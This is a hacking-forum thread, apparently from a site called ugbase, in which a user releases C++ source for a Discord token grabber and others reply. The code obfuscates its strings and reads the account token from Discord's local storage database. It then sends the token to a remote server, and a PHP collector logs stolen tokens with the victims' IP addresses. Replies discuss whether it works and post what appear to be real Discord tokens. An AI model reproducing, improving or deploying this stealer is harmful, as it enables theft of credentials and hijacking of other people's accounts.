CPP RELEASE Discord Token Grabber

[ini]

[font=arial, sans-serif]Hello ugbase I started to build a shitty tool , decided to publish it and maybe someone finds it useful, basically this grab token from local storage file located on appdata\discord\
[size=medium][font=arial, sans-serif]the code is not perfect but it is worth as a base for a future to be improved, This topic can be a used for[size=medium] upload your improvements or we can discuss the subject with respect and also with the purpose of sharing knowledge.[/font][/size][/font][/size]

[font=arial, sans-serif][size=medium][font=arial, sans-serif][size=medium]So basic explanation , discord client executable saves in local storage one token that can be used for hijack others accounts[/font][/size][/font][/size][font=arial, sans-serif].[/font]
This is how the path looks : \AppData\Roaming\discord\Local Storage\https_discordapp.com_0.localstorage
[font=arial, sans-serif][size=medium][font=arial, sans-serif][size=medium]On the file i uploaded we can see sqlite folder and curl lib. those libs can be added on the project.[/font][/size][/font][/size]
[font=arial, sans-serif][size=medium][font=arial, sans-serif][size=medium]Sqlite used for read from the local storage database and get the token column from the table.[/font][/size][/font][/size]
[font=arial, sans-serif][size=medium][font=arial, sans-serif][size=medium]If you download http://sqlitebrowser.org/[/font][/size][/font][/size]
[font=arial, sans-serif][size=medium][font=arial, sans-serif][size=medium]Open your localstorage and check how its data saved.[/font][/size][/font][/size]

[font=arial, sans-serif][size=medium][font=arial, sans-serif][size=medium]Some imgs:[/font][/size][/font][/size]
[font=arial, sans-serif][size=medium][font=arial, sans-serif][size=medium]

[/font][/size][/font][/size]

[font=arial, sans-serif][size=medium][font=arial, sans-serif][size=medium]

[/font][/size][/font][/size]

[font=arial, sans-serif][size=medium][font=arial, sans-serif][size=medium]with discord client [/font][/size][/font][/size]

[font=arial, sans-serif][size=medium][font=arial, sans-serif][size=medium]

[/font][/size][/font][/size]
if you have opened discord you can open console by pressing [ ctr+sift + i ]

So lets start with the c++ part:

// DiscordToken.cpp: define el punto de entrada de la aplicación de consola.
//

#include "stdafx.h"

using namespace std;
//crypted strings
char discord_path[58] = { (char)0x1f, (char)0x28, (char)0x3a, (char)0x3a, (char)0x27, (char)0x40, (char)0x24, (char)0x21, (char)0x12, (char)0x8, (char)0x20, (char)0x31, (char)0x22, (char)0x20, (char)0x73, (char)0x1a, (char)0x30, (char)0x40, (char)0x24, (char)0x24, (char)0x29, (char)0x21, (char)0x13, (char)0x3a, (char)0x37, (char)0x38, (char)0x23, (char)0x3a, (char)0x1b, (char)0x4b, (char)0x3f, (char)0x36, (char)0x2d, (char)0x2b, (char)0x3d, (char)0x36, (char)0x22, (char)0x3c, (char)0x23, (char)0x67, (char)0x27, (char)0x40, (char)0x3b, (char)0x1a, (char)0x7e, (char)0x6a, (char)0x23, (char)0x3d, (char)0x20, (char)0x2d, (char)0x3f, (char)0x3a, (char)0x30, (char)0x40, (char)0x24, (char)0x24, (char)0x29, (char)0x21 };
//
char discord_query[47] = { (char)0x10, (char)0x9, (char)0x1f, (char)0xc, (char)0x7, (char)0x7b, (char)0x76, (char)0x33, (char)0x2f, (char)0x28, (char)0x3a, (char)0x37, (char)0x63, (char)0x2a, (char)0x21, (char)0x26, (char)0x29, (char)0xf, (char)0x1f, (char)0x31, (char)0x2b, (char)0x29, (char)0x1b, (char)0x33, (char)0x21, (char)0x20, (char)0x36, (char)0x69, (char)0x13, (char)0x67, (char)0x13, (char)0x17, (char)0xb, (char)0x64, (char)0x4, (char)0x37, (char)0x3a, (char)0x6c, (char)0x6e, (char)0x69, (char)0x63, (char)0x5b, (char)0x39, (char)0x2e, (char)0x2b, (char)0x2a, (char)0x68 };
//SOFTWARE\'\'Discord
char discord_regedit_path[17] = { (char)0x10, (char)0x23, (char)0x35, (char)0x3d, (char)0x33, (char)0x4e, (char)0x24, (char)0x20, (char)0x12, (char)0x18, (char)0xb, (char)0x3b, (char)0x30, (char)0x2f, (char)0x3c, (char)0x3b, (char)0x20 };
//token
char discord_token[5] = { (char)0x37, (char)0x23, (char)0x38, (char)0x2c, (char)0x2a };
//4d4098d64e163d2726959455d046fd7c
char discord_state[32] = { (char)0x77, (char)0x28, (char)0x67, (char)0x79, (char)0x7d, (char)0x17, (char)0x32, (char)0x73, (char)0x7a, (char)0x21, (char)0x7e, (char)0x64, (char)0x70, (char)0x28, (char)0x61, (char)0x7e, (char)0x76, (char)0x19, (char)0x6f, (char)0x70, (char)0x77, (char)0x70, (char)0x7a, (char)0x67, (char)0x27, (char)0x7c, (char)0x67, (char)0x7f, (char)0x22, (char)0x4b, (char)0x61, (char)0x26 };

//trick
char discord_trick[6] = { (char)0x37, (char)0x23, (char)0x38, (char)0x2c, (char)0x2a, (char)0x12, };


//shitty xor dec
string xor_crypt(string toencrypt)
{
	const char _v[] = "CLSID/VENDOR";
	string output = toencrypt;
	for (int i = 0; i < toencrypt.size(); i++) {
		output[i] = toencrypt[i] ^ _v[i % strlen(_v)]; 
	}
	return output;
}
//shitty xor enc
string xor_encrypt(string toencrypt) 
{
	const char _v[] = "CLSID/VENDOR";
	string output = toencrypt;
	printf("char discord_char[%d] = { ", toencrypt.size());
	for (int i = 0; i < toencrypt.size(); i++) {
		output[i] = toencrypt[i] ^ _v[i % strlen(_v)];
		printf("(char)0x%x, ", output[i]);
	}
	printf(" };");
	return output;
}

#define BUFFERSIZE 1024

void die_with_error(char *errorMessage);
void die_with_wserror(char *errorMessage);

bool bGrabbed() {
	char value[255];
	DWORD BufferSize = 256;
	string decrypted_regedit_path = xor_crypt(discord_regedit_path);
	string decrypted_token = xor_crypt(discord_token);
	string decrypted_state = xor_crypt(discord_state);
	RegGetValue(HKEY_CURRENT_USER, decrypted_regedit_path.c_str(), decrypted_token.c_str(), REG_SZ, NULL, (PVOID)&value, &BufferSize);
	if (strcmp(decrypted_state.c_str(), value) == 0) return true;
	else return false;
}

bool bFileExists(char* name) {
	if (FILE *file = fopen(name, "r")) {
		fclose(file);
		return true;
	}
	else {
		fclose(file);
		return false;
	}
}
char token[59];
static int callback(void *data, int argc, char **argv, char **azColName) {
	int i;

	//printf("\nTOKEN:");
	int j = 0;
	for (i = 0; i < argc; i++) {
		for (int c = 2; c <= 59 * 2; c++) {
			if (argv[i][c] == 0) continue;
			//printf("%c", argv[i][c]);
			token[j] = argv[i][c];
			//printf("|number:%d|", j);
			j++;
		}
	}


	return 0;
}

int main()
{
	bool Finished = false;

	if (bGrabbed()) {
		//INJECT
		printf("kys");
	}
	else {

		string decrypted_path = xor_crypt(discord_path);
		string decrypted_query = xor_crypt(discord_query);


		string keked = xor_encrypt("token=");


		TCHAR   achDevice[MAX_PATH];
		HRESULT  hr;
		if (SUCCEEDED(hr = SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, 0, achDevice))) {
			char *db_path = strcat(achDevice, decrypted_path.c_str());
			if (bFileExists(db_path)) {

				sqlite3 *db;
				int rc;
				rc = sqlite3_open(achDevice, &db);
				if (rc) {
					return(0);
				}
				rc = sqlite3_exec(db, decrypted_query.c_str(), callback, NULL, NULL);
				sqlite3_close(db);
				//SEND DATA TO SERVER
				//CURL LIB TEST
				CURL *curl;
				CURLcode res;
				curl_global_init(CURL_GLOBAL_ALL);
				curl = curl_easy_init();
				if (curl) {

					string decryptes_url = xor_crypt(discord_char);
					decryptes_url += "p";
					cout << decryptes_url;

					curl_easy_setopt(curl, CURLOPT_URL, decryptes_url.c_str());
					
					char buffer[255];
					sprintf(buffer, "k=%s", token);
					
					curl_easy_setopt(curl, CURLOPT_POSTFIELDS, buffer);
					 
					
					res = curl_easy_perform(curl);
				
					curl_easy_cleanup(curl);
				} 
				curl_global_cleanup();

				//SET REGEDIT GIFT				
				//string decrypted_regedit_path = xor_crypt(discord_regedit_path);
				//string decrypted_token = xor_crypt(discord_token);
				//string decrypted_state = xor_crypt(discord_state);
				//HKEY hkey;
				//long regOpenResult;
				//const char *path = decrypted_state.c_str();
				//HKEY hKey = NULL;
				//DWORD rtime;

				////Step 1: Open the key
				//long sts = RegOpenKeyEx(HKEY_CURRENT_USER, decrypted_regedit_path.c_str(), 0, KEY_READ, &hKey);

				////Step 2: If failed, create the key
				//if (ERROR_NO_MATCH == sts || ERROR_FILE_NOT_FOUND == sts)
				//{
				//	long j = RegCreateKeyEx(HKEY_CURRENT_USER, decrypted_regedit_path.c_str(), 0L, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);


				//	regOpenResult = RegOpenKeyEx(HKEY_CURRENT_USER, decrypted_regedit_path.c_str(), 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hkey);
				//	LPCSTR stuff = decrypted_token.c_str();
				//	RegSetValueEx(hkey, stuff, 0, REG_SZ, (BYTE*)path, strlen(path));

				//}
				//RegCloseKey(hkey);
			}
		}
	}
	cin.get();


	return 0;
}

if you want also the server shit u can add a simple php for save the stolen tokens in ur web:

	function getRealIpAddr()
	{
		if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
		{
		  $ip=$_SERVER['HTTP_CLIENT_IP'];
		}
		elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
		{
		  $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
		}
		else
		{
		  $ip=$_SERVER['REMOTE_ADDR'];
		}
		return $ip;
	}
	
    if(isset($_POST['k'])){
		
        $file = 'tokens.txt'; 
        $somecontent = "[CLIENT-IP]:".getRealIpAddr()."[TOKEN]:".$_POST['k'];
        $fp = fopen($file, 'a') or die('Could not open file!');
        fwrite($fp, $somecontent."\r\n") or die('Could not write to file');
        fclose($fp);
    }

i send here curl lib and sqlite 
FILES

 

[ini]

bumpp

 

[monday]

nice one, btw did you test it? Are you sure it doesn't check any other request headers or IP?

You could test it with mine if you'd like to:
3MjQwMDQ0NTQ0.DavQgA.pojId5aS9riLPSqnnk3aOqxeZ4g

Btw doesn't it require to be inside C:\Users\user folder? Idk if it will work with that code but you could try using %appdata% environment variable

C:\>cd /D D:

D:\>echo %appdata%
C:\Users\user\AppData\Roaming

D:\>echo %appdata%\discord\Local Storage\https_discordapp.com_0.localstorage
C:\Users\user\AppData\Roaming\discord\Local Storage\https_discordapp.com_0.localstorage

 

[monday]

nice one, btw did you test it? Are you sure it doesn't check any other request headers or IP?

You could test it with mine if you'd like to:
3MjQwMDQ0NTQ0.DavQgA.pojId5aS9riLPSqnnk3aOqxeZ4g

Btw doesn't it require to be inside C:\Users\user folder? Idk if it will work with that code but you could try using %appdata% environment variable

C:\>cd /D D:

D:\>echo %appdata%
C:\Users\user\AppData\Roaming

D:\>echo %appdata%\discord\Local Storage\https_discordapp.com_0.localstorage
C:\Users\user\AppData\Roaming\discord\Local Storage\https_discordapp.com_0.localstorage

Anyway this forum settings are retarded:
Want to post something? No problem
Want to edit it? Post gets deleted till moderation approves it

 

[ini]

nice one, btw did you test it? Are you sure it doesn't check any other request headers or IP?

You could test it with mine if you'd like to:
3MjQwMDQ0NTQ0.DavQgA.pojId5aS9riLPSqnnk3aOqxeZ4g

Btw doesn't it require to be inside C:\Users\user folder? Idk if it will work with that code but you could try using %appdata% environment variable

C:\>cd /D D:

D:\>echo %appdata%
C:\Users\user\AppData\Roaming

D:\>echo %appdata%\discord\Local Storage\https_discordapp.com_0.localstorage
C:\Users\user\AppData\Roaming\discord\Local Storage\https_discordapp.com_0.localstorage

Anyway this forum settings are retarded:
Want to post something? No problem
Want to edit it? Post gets deleted till moderation approves it

yes tested on some pc's , and worked, but that code is very shitty , need various fixes ,im not sure about where always sabes the localstorage.
Probably is there any info related about that ,idk lol

and used your token and didnt worked, probably you changed it hehehe

---

nice one, btw did you test it? Are you sure it doesn't check any other request headers or IP?

You could test it with mine if you'd like to:
3MjQwMDQ0NTQ0.DavQgA.pojId5aS9riLPSqnnk3aOqxeZ4g

Btw doesn't it require to be inside C:\Users\user folder? Idk if it will work with that code but you could try using %appdata% environment variable

C:\>cd /D D:

D:\>echo %appdata%
C:\Users\user\AppData\Roaming

D:\>echo %appdata%\discord\Local Storage\https_discordapp.com_0.localstorage
C:\Users\user\AppData\Roaming\discord\Local Storage\https_discordapp.com_0.localstorage

Anyway this forum settings are retarded:
Want to post something? No problem
Want to edit it? Post gets deleted till moderation approves it

btw your token lenght must be 59 characters

 

[monday]

it looks like it's changed after logging out it logging in idk. I guess it was shorter because I didn't log to that account for a long time. Here's a new one:
Mzg2MzM2NzY3MjQwMDQ0NTQ0.Davg6g.GqWHw5ejYhw3wKWVEf6wG520ins

It appears constantly at the "discordapp.com" even after closing the browser

 

[ini]

it looks like it's changed after logging out it logging in idk. I guess it was shorter because I didn't log to that account for a long time. Here's a new one:
Mzg2MzM2NzY3MjQwMDQ0NTQ0.Davg6g.GqWHw5ejYhw3wKWVEf6wG520ins

It appears constantly at the "discordapp.com" even after closing the browser

well add me on discord ini#1625

---

it looks like it's changed after logging out it logging in idk. I guess it was shorter because I didn't log to that account for a long time. Here's a new one:
Mzg2MzM2NzY3MjQwMDQ0NTQ0.Davg6g.GqWHw5ejYhw3wKWVEf6wG520ins

It appears constantly at the "discordapp.com" even after closing the browser

probably you have nitro, im not sure if with nitro works good
i think nitro generates bigger token and also that token is changing every time you log in/out the account

 

[monday]

I have normal one, I think it changed because I logged out which I did. Now I just left it like it is and it appears to be the same all the time